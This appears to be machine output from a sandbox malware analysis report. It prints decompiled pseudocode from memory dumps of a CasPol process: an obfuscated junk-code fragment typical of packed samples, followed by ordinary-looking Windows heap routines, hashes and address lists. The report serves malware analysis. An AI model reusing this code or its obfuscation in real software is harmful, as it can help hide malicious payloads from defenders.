                                                                											 *0x5aad772d =  *0x5aad772d << 0xe5;
                                                                											_push( *0xd2e2a37);
                                                                											if( *0x5aad772d < 0) {
                                                                												 *0x37ae98f0 =  *0x37ae98f0 & _t55;
                                                                												asm("adc cl, 0x2a");
                                                                												asm("sbb esp, 0x1b78f326");
                                                                												_t36 = _t36 & 0x6b53dcb8;
                                                                												asm("scasb");
                                                                												_pop(_t47);
                                                                												_push(0x6eeab0a9);
                                                                												asm("ror dword [0x99e9050f], 0x65");
                                                                												_t42 = _t47;
                                                                												 *0xc31e7cbd =  *0xc31e7cbd << 0x61;
                                                                												 *0x1afa09ff =  *0x1afa09ff << 0x9c;
                                                                												if( *0x1afa09ff >= 0) {
                                                                													_t63 =  *0xaef3557c * 0x3f69;
                                                                													if(_t63 == 0) {
                                                                														_pop( *0x3680c275);
                                                                														 *0x768d3dc6 =  *0x768d3dc6 | _t42;
                                                                														 *0x39efe7bf =  *0x39efe7bf << 0xc0;
                                                                														 *0x6144721c =  *0x6144721c << 0xc1;
                                                                														if( *0x6144721c == 0) {
                                                                															_push(0x7656ac75);
                                                                															_t36 = _t36 &  *0x62ea9fb1;
                                                                															_t27 = _t33;
                                                                															_t33 =  *0x7b4b058c;
                                                                															 *0x7b4b058c = _t27;
                                                                															if(_t36 <= 0) {
                                                                																 *0xf16e17b8 =  *0xf16e17b8 << 0x58;
                                                                																 *0xa5767af2 =  *0x11a1807f * 0x48e0;
                                                                																_t42 = _t42 -  *0x5c76028d;
                                                                																_t60 = _t60 -  *0x62ff57d3;
                                                                																_t36 = 0xed662cda;
                                                                																 *0x2a630d97 =  *0x2a630d97 >> 0xbd;
                                                                																_t56 = _t55 - 0xe4;
                                                                																if(_t56 >= 0) {
                                                                																	asm("rol dword [0x52e32a78], 0x19");
                                                                																	asm("adc bl, 0xb6");
                                                                																	 *0xbe9dc7ed =  *0xbe9dc7ed | _t63;
                                                                																	 *0xd6aac80b =  *0xd6aac80b >> 0x4c;
                                                                																	 *0xb80ca632 =  *0xb80ca632 ^ (_t56 + 0x6a953539 | 0xaf3961a3);
                                                                																	_pop( *0x39a9c2ff);
                                                                																	 *0xca3ff0bc =  *0xca3ff0bc << 2;
                                                                																	asm("adc bl, 0xe7");
                                                                																	asm("ror byte [0x8e433510], 0x79");
                                                                																	asm("lodsd");
                                                                																	_t33 = _t33 ^  *0xbb669291 ^ 0x7712c22d;
                                                                																	asm("sbb esp, [0xbe39aec0]");
                                                                																	asm("adc bl, 0x38");
                                                                																	_t36 = 0xed662cda &  *0x52569bca;
                                                                																	_t42 = _t42 & 0x00000014;
                                                                																}
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				goto L1;
                                                                			}





















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                • Instruction ID: 5ad36da0b66271df10871577adf4d074f67d7f2fbf4e1e217e99ca9f372f47b0
                                                                • Opcode Fuzzy Hash: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                • Instruction Fuzzy Hash: CFA1D7729093A4DFE312DF38E946B163BB5F352720B48470ED8A1472C2D7B8161ADF4A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 39%
                                                                			E016BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                				char _v8;
                                                                				signed int _v12;
                                                                				signed int _t80;
                                                                				signed int _t83;
                                                                				intOrPtr _t89;
                                                                				signed int _t92;
                                                                				signed char _t106;
                                                                				signed int* _t107;
                                                                				intOrPtr _t108;
                                                                				intOrPtr _t109;
                                                                				signed int _t114;
                                                                				void* _t115;
                                                                				void* _t117;
                                                                				void* _t119;
                                                                				void* _t122;
                                                                				signed int _t123;
                                                                				signed int* _t124;
                                                                
                                                                				_t106 = _a12;
                                                                				if((_t106 & 0xfffffffc) != 0) {
                                                                					return 0xc000000d;
                                                                				}
                                                                				if((_t106 & 0x00000002) != 0) {
                                                                					_t106 = _t106 | 0x00000001;
                                                                				}
                                                                				_t109 =  *0x1717b9c; // 0x0
                                                                				_t124 = L01644620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                				if(_t124 != 0) {
                                                                					 *_t124 =  *_t124 & 0x00000000;
                                                                					_t124[1] = _t124[1] & 0x00000000;
                                                                					_t124[4] = _t124[4] & 0x00000000;
                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                						L13:
                                                                						_push(_t124);
                                                                						if((_t106 & 0x00000002) != 0) {
                                                                							_push(0x200);
                                                                							_push(0x28);
                                                                							_push(0xffffffff);
                                                                							_t122 = E01669800();
                                                                							if(_t122 < 0) {
                                                                								L33:
                                                                								if((_t124[4] & 0x00000001) != 0) {
                                                                									_push(4);
                                                                									_t64 =  &(_t124[1]); // 0x4
                                                                									_t107 = _t64;
                                                                									_push(_t107);
                                                                									_push(5);
                                                                									_push(0xfffffffe);
                                                                									E016695B0();
                                                                									if( *_t107 != 0) {
                                                                										_push( *_t107);
                                                                										E016695D0();
                                                                									}
                                                                								}
                                                                								_push(_t124);
                                                                								_push(0);
                                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                								L37:
                                                                								L016477F0();
                                                                								return _t122;
                                                                							}
                                                                							_t124[4] = _t124[4] | 0x00000002;
                                                                							L18:
                                                                							_t108 = _a8;
                                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                                							_t80 = _t29;
                                                                							_t30 =  &(_t124[5]); // 0x14
                                                                							_t124[3] = _t80;
                                                                							_t123 = 0;
                                                                							_t124[2] = _t30;
                                                                							 *_t80 = _t108;
                                                                							if(_t108 == 0) {
                                                                								L21:
                                                                								_t112 = 0x400;
                                                                								_push( &_v8);
                                                                								_v8 = 0x400;
                                                                								_push(_t124[2]);
                                                                								_push(0x400);
                                                                								_push(_t124[3]);
                                                                								_push(0);
                                                                								_push( *_t124);
                                                                								_t122 = E01669910();
                                                                								if(_t122 != 0xc0000023) {
                                                                									L26:
                                                                									if(_t122 != 0x106) {
                                                                										L40:
                                                                										if(_t122 < 0) {
                                                                											L29:
                                                                											_t83 = _t124[2];
                                                                											if(_t83 != 0) {
                                                                												_t59 =  &(_t124[5]); // 0x14
                                                                												if(_t83 != _t59) {
                                                                													L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                												}
                                                                											}
                                                                											_push( *_t124);
                                                                											E016695D0();
                                                                											goto L33;
                                                                										}
                                                                										 *_a16 = _t124;
                                                                										return 0;
                                                                									}
                                                                									if(_t108 != 1) {
                                                                										_t122 = 0;
                                                                										goto L40;
                                                                									}
                                                                									_t122 = 0xc0000061;
                                                                									goto L29;
                                                                								} else {
                                                                									goto L22;
                                                                								}
                                                                								while(1) {
                                                                									L22:
                                                                									_t89 =  *0x1717b9c; // 0x0
                                                                									_t92 = L01644620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                									_t124[2] = _t92;
                                                                									if(_t92 == 0) {
                                                                										break;
                                                                									}
                                                                									_t112 =  &_v8;
                                                                									_push( &_v8);
                                                                									_push(_t92);
                                                                									_push(_v8);
                                                                									_push(_t124[3]);
                                                                									_push(0);
                                                                									_push( *_t124);
                                                                									_t122 = E01669910();
                                                                									if(_t122 != 0xc0000023) {
                                                                										goto L26;
                                                                									}
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                								}
                                                                								_t122 = 0xc0000017;
                                                                								goto L26;
                                                                							}
                                                                							_t119 = 0;
                                                                							do {
                                                                								_t114 = _t124[3];
                                                                								_t119 = _t119 + 0xc;
                                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                								_t123 = _t123 + 1;
                                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                							} while (_t123 < _t108);
                                                                							goto L21;
                                                                						}
                                                                						_push(0x28);
                                                                						_push(3);
                                                                						_t122 = E0162A7B0();
                                                                						if(_t122 < 0) {
                                                                							goto L33;
                                                                						}
                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                						goto L18;
                                                                					}
                                                                					if((_t106 & 0x00000001) == 0) {
                                                                						_t115 = 0x28;
                                                                						_t122 = E016BE7D3(_t115, _t124);
                                                                						if(_t122 < 0) {
                                                                							L9:
                                                                							_push(_t124);
                                                                							_push(0);
                                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                							goto L37;
                                                                						}
                                                                						L12:
                                                                						if( *_t124 != 0) {
                                                                							goto L18;
                                                                						}
                                                                						goto L13;
                                                                					}
                                                                					_t15 =  &(_t124[1]); // 0x4
                                                                					_t117 = 4;
                                                                					_t122 = E016BE7D3(_t117, _t15);
                                                                					if(_t122 >= 0) {
                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                						_v12 = _v12 & 0x00000000;
                                                                						_push(4);
                                                                						_push( &_v12);
                                                                						_push(5);
                                                                						_push(0xfffffffe);
                                                                						E016695B0();
                                                                						goto L12;
                                                                					}
                                                                					goto L9;
                                                                				} else {
                                                                					return 0xc0000017;
                                                                				}
                                                                			}





















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                                                                • Instruction ID: 3aafd0da5c6b6e0fa222a3a056c99d5644905ae77a8a74faf356e9be1d42dd65
                                                                • Opcode Fuzzy Hash: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                                                                • Instruction Fuzzy Hash: B671F132640702EFE732DF18CC85FA6BBA6EB40720F15492CEA55876A1DB71E981CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 79%
                                                                			E016A6DC9(signed int __ecx, void* __edx) {
                                                                				unsigned int _v8;
                                                                				intOrPtr _v12;
                                                                				signed int _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				char _v32;
                                                                				char _v36;
                                                                				char _v40;
                                                                				char _v44;
                                                                				char _v48;
                                                                				char _v52;
                                                                				char _v56;
                                                                				char _v60;
                                                                				void* _t87;
                                                                				void* _t95;
                                                                				signed char* _t96;
                                                                				signed int _t107;
                                                                				signed int _t136;
                                                                				signed char* _t137;
                                                                				void* _t157;
                                                                				void* _t161;
                                                                				void* _t167;
                                                                				intOrPtr _t168;
                                                                				void* _t174;
                                                                				void* _t175;
                                                                				signed int _t176;
                                                                				void* _t177;
                                                                
                                                                				_t136 = __ecx;
                                                                				_v44 = 0;
                                                                				_t167 = __edx;
                                                                				_v40 = 0;
                                                                				_v36 = 0;
                                                                				_v32 = 0;
                                                                				_v60 = 0;
                                                                				_v56 = 0;
                                                                				_v52 = 0;
                                                                				_v48 = 0;
                                                                				_v16 = __ecx;
                                                                				_t87 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                				_t175 = _t87;
                                                                				if(_t175 != 0) {
                                                                					_t11 = _t175 + 0x30; // 0x30
                                                                					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                					E016A6B4C(_t167, _t11, 0x214,  &_v8);
                                                                					_v12 = _v8 + 0x10;
                                                                					_t95 = E01647D50();
                                                                					_t137 = 0x7ffe0384;
                                                                					if(_t95 == 0) {
                                                                						_t96 = 0x7ffe0384;
                                                                					} else {
                                                                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                					}
                                                                					_push(_t175);
                                                                					_push(_v12);
                                                                					_push(0x402);
                                                                					_push( *_t96 & 0x000000ff);
                                                                					E01669AE0();
                                                                					_t87 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                					_t176 = _v16;
                                                                					if((_t176 & 0x00000100) != 0) {
                                                                						_push( &_v36);
                                                                						_t157 = 4;
                                                                						_t87 = E016A795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                						if(_t87 >= 0) {
                                                                							_v24 = E016A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                							_v28 = E016A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                							_push( &_v52);
                                                                							_t161 = 5;
                                                                							_t168 = E016A795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                							_v20 = _t168;
                                                                							_t107 = L01644620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                							_v16 = _t107;
                                                                							if(_t107 != 0) {
                                                                								_v8 = _v8 & 0x00000000;
                                                                								 *(_t107 + 0x20) = _t176;
                                                                								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                								_t47 = _t107 + 0x24; // 0x24
                                                                								_t177 = _t47;
                                                                								E016A6B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                								_t51 = _v8 + 4; // 0x4
                                                                								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                								_v12 = _t51;
                                                                								E016A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                								_v12 = _v12 + _v8;
                                                                								E016A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                								_t125 = _v8;
                                                                								_v12 = _v12 + _v8;
                                                                								E016A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                								_t174 = _v12 + _v8;
                                                                								if(E01647D50() != 0) {
                                                                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                								}
                                                                								_push(_v16);
                                                                								_push(_t174);
                                                                								_push(0x402);
                                                                								_push( *_t137 & 0x000000ff);
                                                                								E01669AE0();
                                                                								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                								_t168 = _v20;
                                                                							}
                                                                							_t87 = L01642400( &_v36);
                                                                							if(_v24 >= 0) {
                                                                								_t87 = L01642400( &_v44);
                                                                							}
                                                                							if(_t168 >= 0) {
                                                                								_t87 = L01642400( &_v52);
                                                                							}
                                                                							if(_v28 >= 0) {
                                                                								return L01642400( &_v60);
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t87;
                                                                			}
































                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                • Instruction ID: dad0ceefa39edb3dc9c80d6680bef4058b6f058031d30dc8fe5e1a48246f5ad4
                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                • Instruction Fuzzy Hash: 22716B71A0021AEFDB10DFA8CD84AEEBBBAFF48714F544469E505A7250DB30AE41CF94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016E1002(intOrPtr __ecx, void* __edx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				signed int _v20;
                                                                				signed int _t75;
                                                                				intOrPtr* _t76;
                                                                				signed int _t77;
                                                                				signed short _t78;
                                                                				signed short _t80;
                                                                				signed int _t81;
                                                                				signed short _t82;
                                                                				signed short _t83;
                                                                				signed short _t85;
                                                                				signed int _t86;
                                                                				void* _t90;
                                                                				signed short _t91;
                                                                				signed int _t95;
                                                                				signed short _t97;
                                                                				signed short _t99;
                                                                				intOrPtr* _t101;
                                                                				signed short _t102;
                                                                				signed int _t103;
                                                                				signed short _t105;
                                                                				intOrPtr _t106;
                                                                				signed int* _t108;
                                                                				signed short _t109;
                                                                				signed short _t111;
                                                                				signed short _t112;
                                                                				signed int _t113;
                                                                				signed short _t117;
                                                                				signed int _t120;
                                                                				void* _t121;
                                                                				signed int _t122;
                                                                				signed int _t126;
                                                                				signed int* _t127;
                                                                				signed short _t128;
                                                                				intOrPtr _t129;
                                                                				intOrPtr _t130;
                                                                				signed int _t132;
                                                                				signed int _t133;
                                                                
                                                                				_t121 = __edx;
                                                                				_t130 = __ecx;
                                                                				_v16 = __ecx;
                                                                				_t108 = __ecx + 0xa4;
                                                                				_t75 =  *_t108;
                                                                				L4:
                                                                				if(_t75 != _t108) {
                                                                					goto L1;
                                                                				} else {
                                                                					_t127 = _t130 + 0x9c;
                                                                					_t120 =  *_t127;
                                                                				}
                                                                				while(_t120 != _t127) {
                                                                					_t132 = _t120 & 0xffff0000;
                                                                					__eflags = _t132 - _t121;
                                                                					if(_t132 <= _t121) {
                                                                						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
                                                                						__eflags = _t75 - _t121;
                                                                						if(_t75 > _t121) {
                                                                							 *0x1715898 = 5;
                                                                						}
                                                                					}
                                                                					_t120 =  *_t120;
                                                                				}
                                                                				L68:
                                                                				return _t75;
                                                                				L1:
                                                                				_t3 = _t75 - 0x10; // -16
                                                                				_t126 = _t3;
                                                                				_v20 = _t126;
                                                                				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
                                                                				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
                                                                					L3:
                                                                					_t75 =  *_t75;
                                                                					goto L4;
                                                                				}
                                                                				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
                                                                				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
                                                                					_t8 = _t126 + 0x38; // 0x28
                                                                					_t101 = _t8;
                                                                					_t109 = 0;
                                                                					_v8 = _v8 & 0;
                                                                					_t76 =  *_t101;
                                                                					_v12 = _t101;
                                                                					__eflags = _t76 - _t101;
                                                                					if(_t76 == _t101) {
                                                                						L17:
                                                                						_t102 = 0;
                                                                						_v20 = 0;
                                                                						__eflags = _t109;
                                                                						if(_t109 == 0) {
                                                                							_t109 = _t126;
                                                                						}
                                                                						_t128 = 0;
                                                                						__eflags = _t109 - _t121;
                                                                						if(_t109 >= _t121) {
                                                                							L29:
                                                                							_t111 = _v8 + 0xfffffff8;
                                                                							__eflags = _t111 - _t121;
                                                                							if(_t111 <= _t121) {
                                                                								L33:
                                                                								 *0x17158b0 = _t128;
                                                                								 *0x17158b4 = _t102;
                                                                								__eflags = _t128;
                                                                								if(_t128 == 0) {
                                                                									L42:
                                                                									__eflags =  *(_t130 + 0x4c);
                                                                									if( *(_t130 + 0x4c) == 0) {
                                                                										_t77 =  *_t128 & 0x0000ffff;
                                                                										_t112 = 0;
                                                                										__eflags = 0;
                                                                									} else {
                                                                										_t85 =  *_t128;
                                                                										_t112 =  *(_t130 + 0x4c);
                                                                										__eflags = _t85 & _t112;
                                                                										if((_t85 & _t112) != 0) {
                                                                											_t85 = _t85 ^  *(_t130 + 0x50);
                                                                											__eflags = _t85;
                                                                										}
                                                                										_t77 = _t85 & 0x0000ffff;
                                                                									}
                                                                									_v8 = _t77;
                                                                									__eflags = _t102;
                                                                									if(_t102 != 0) {
                                                                										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
                                                                										__eflags = _t117;
                                                                										 *0x17158b8 = _t117;
                                                                										_t112 =  *(_t130 + 0x4c);
                                                                									}
                                                                									__eflags = _t112;
                                                                									if(_t112 == 0) {
                                                                										_t78 =  *_t128 & 0x0000ffff;
                                                                									} else {
                                                                										_t83 =  *_t128;
                                                                										__eflags =  *(_t130 + 0x4c) & _t83;
                                                                										if(( *(_t130 + 0x4c) & _t83) != 0) {
                                                                											_t83 = _t83 ^  *(_t130 + 0x50);
                                                                											__eflags = _t83;
                                                                										}
                                                                										_t78 = _t83 & 0x0000ffff;
                                                                									}
                                                                									_t122 = _t78 & 0x0000ffff;
                                                                									 *0x17158bc = _t122;
                                                                									__eflags =  *(_t130 + 0x4c);
                                                                									_t113 = _v8 & 0x0000ffff;
                                                                									if( *(_t130 + 0x4c) == 0) {
                                                                										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
                                                                									} else {
                                                                										_t82 =  *(_t128 + _t113 * 8);
                                                                										__eflags =  *(_t130 + 0x4c) & _t82;
                                                                										if(( *(_t130 + 0x4c) & _t82) != 0) {
                                                                											_t82 = _t82 ^  *(_t130 + 0x50);
                                                                											__eflags = _t82;
                                                                										}
                                                                										_t122 =  *0x17158bc; // 0x0
                                                                										_t80 = _t82 & 0x0000ffff;
                                                                									}
                                                                									_t81 = _t80 & 0x0000ffff;
                                                                									__eflags =  *0x17158b8 - _t81; // 0x0
                                                                									if(__eflags == 0) {
                                                                										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
                                                                										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
                                                                										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
                                                                											goto L68;
                                                                										}
                                                                										 *0x1715898 = 7;
                                                                										return _t75;
                                                                									} else {
                                                                										 *0x1715898 = 6;
                                                                										return _t81;
                                                                									}
                                                                								}
                                                                								__eflags = _t102;
                                                                								if(_t102 == 0) {
                                                                									goto L42;
                                                                								}
                                                                								__eflags =  *(_t130 + 0x4c);
                                                                								if( *(_t130 + 0x4c) == 0) {
                                                                									_t86 =  *_t128 & 0x0000ffff;
                                                                								} else {
                                                                									_t91 =  *_t128;
                                                                									__eflags =  *(_t130 + 0x4c) & _t91;
                                                                									if(( *(_t130 + 0x4c) & _t91) != 0) {
                                                                										_t91 = _t91 ^  *(_t130 + 0x50);
                                                                										__eflags = _t91;
                                                                									}
                                                                									_t86 = _t91 & 0x0000ffff;
                                                                								}
                                                                								_v8 = _t86;
                                                                								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
                                                                								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
                                                                								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
                                                                									goto L42;
                                                                								} else {
                                                                									 *0x1715898 = 4;
                                                                									return _t90;
                                                                								}
                                                                							}
                                                                							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
                                                                							while(1) {
                                                                								_t102 = _t111;
                                                                								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
                                                                								__eflags = _t95;
                                                                								if(_t95 == 0) {
                                                                									goto L33;
                                                                								}
                                                                								_t111 = _t111 + _t95 * 0xfffffff8;
                                                                								__eflags = _t111 - _t121;
                                                                								if(_t111 > _t121) {
                                                                									continue;
                                                                								}
                                                                								goto L33;
                                                                							}
                                                                							goto L33;
                                                                						} else {
                                                                							_t103 =  *(_t130 + 0x4c);
                                                                							while(1) {
                                                                								_t128 = _t109;
                                                                								__eflags = _t103;
                                                                								if(_t103 == 0) {
                                                                									_t97 =  *_t109 & 0x0000ffff;
                                                                								} else {
                                                                									_t99 =  *_t109;
                                                                									_t103 =  *(_t130 + 0x4c);
                                                                									__eflags = _t99 & _t103;
                                                                									if((_t99 & _t103) != 0) {
                                                                										_t99 = _t99 ^  *(_t130 + 0x50);
                                                                										__eflags = _t99;
                                                                									}
                                                                									_t97 = _t99 & 0x0000ffff;
                                                                								}
                                                                								__eflags = _t97;
                                                                								if(_t97 == 0) {
                                                                									break;
                                                                								}
                                                                								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
                                                                								__eflags = _t109 - _t121;
                                                                								if(_t109 < _t121) {
                                                                									continue;
                                                                								}
                                                                								break;
                                                                							}
                                                                							_t102 = _v20;
                                                                							goto L29;
                                                                						}
                                                                					}
                                                                					_t133 = _v8;
                                                                					do {
                                                                						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
                                                                						_t129 = _v12;
                                                                						__eflags = _t105 - _t121;
                                                                						if(_t105 < _t121) {
                                                                							__eflags = _t105 - _t109;
                                                                							if(_t105 > _t109) {
                                                                								_t109 = _t105;
                                                                							}
                                                                						}
                                                                						_t106 =  *((intOrPtr*)(_t76 + 8));
                                                                						__eflags = _t106 - _t121;
                                                                						if(_t106 > _t121) {
                                                                							__eflags = _t133;
                                                                							if(_t133 == 0) {
                                                                								L14:
                                                                								_t18 = _t76 - 8; // -8
                                                                								_t133 = _t18;
                                                                								goto L15;
                                                                							}
                                                                							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
                                                                							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
                                                                								goto L15;
                                                                							}
                                                                							goto L14;
                                                                						}
                                                                						L15:
                                                                						_t76 =  *_t76;
                                                                						__eflags = _t76 - _t129;
                                                                					} while (_t76 != _t129);
                                                                					_t126 = _v20;
                                                                					_v8 = _t133;
                                                                					_t130 = _v16;
                                                                					goto L17;
                                                                				}
                                                                				goto L3;
                                                                			}
                                                                0x016e118f
                                                                0x016e1191
                                                                0x016e1191
                                                                0x016e1191
                                                                0x016e1194
                                                                0x016e1194
                                                                0x016e119c
                                                                0x016e11a2
                                                                0x016e11a8
                                                                0x016e11ac
                                                                0x016e11af
                                                                0x016e11c7
                                                                0x016e11b1
                                                                0x016e11b1
                                                                0x016e11b4
                                                                0x016e11b7
                                                                0x016e11b9
                                                                0x016e11b9
                                                                0x016e11b9
                                                                0x016e11bc
                                                                0x016e11c2
                                                                0x016e11c2
                                                                0x016e11cb
                                                                0x016e11ce
                                                                0x016e11d4
                                                                0x016e11e7
                                                                0x016e11ed
                                                                0x016e11ef
                                                                0x00000000
                                                                0x00000000
                                                                0x016e11f1
                                                                0x00000000
                                                                0x016e11d6
                                                                0x016e11d6
                                                                0x00000000
                                                                0x016e11d6
                                                                0x016e11d4
                                                                0x016e1104
                                                                0x016e1106
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1108
                                                                0x016e110c
                                                                0x016e111d
                                                                0x016e110e
                                                                0x016e110e
                                                                0x016e1110
                                                                0x016e1113
                                                                0x016e1115
                                                                0x016e1115
                                                                0x016e1115
                                                                0x016e1118
                                                                0x016e1118
                                                                0x016e1126
                                                                0x016e113a
                                                                0x016e113d
                                                                0x016e113f
                                                                0x00000000
                                                                0x016e1141
                                                                0x016e1141
                                                                0x00000000
                                                                0x016e1141
                                                                0x016e113f
                                                                0x016e10d6
                                                                0x016e10d9
                                                                0x016e10dd
                                                                0x016e10e3
                                                                0x016e10e6
                                                                0x016e10e9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10ee
                                                                0x016e10f0
                                                                0x016e10f2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10f2
                                                                0x00000000
                                                                0x016e1099
                                                                0x016e1099
                                                                0x016e109c
                                                                0x016e109c
                                                                0x016e109e
                                                                0x016e10a0
                                                                0x016e10b3
                                                                0x016e10a2
                                                                0x016e10a2
                                                                0x016e10a4
                                                                0x016e10a7
                                                                0x016e10a9
                                                                0x016e10ab
                                                                0x016e10ab
                                                                0x016e10ab
                                                                0x016e10ae
                                                                0x016e10ae
                                                                0x016e10b6
                                                                0x016e10b9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10be
                                                                0x016e10c1
                                                                0x016e10c3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10c3
                                                                0x016e10c5
                                                                0x00000000
                                                                0x016e10c5
                                                                0x016e1097
                                                                0x016e1050
                                                                0x016e1053
                                                                0x016e1056
                                                                0x016e1059
                                                                0x016e105c
                                                                0x016e105e
                                                                0x016e1060
                                                                0x016e1062
                                                                0x016e1064
                                                                0x016e1064
                                                                0x016e1062
                                                                0x016e1066
                                                                0x016e1069
                                                                0x016e106b
                                                                0x016e106d
                                                                0x016e106f
                                                                0x016e1076
                                                                0x016e1076
                                                                0x016e1076
                                                                0x00000000
                                                                0x016e1076
                                                                0x016e1071
                                                                0x016e1074
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1074
                                                                0x016e1079
                                                                0x016e1079
                                                                0x016e107b
                                                                0x016e107b
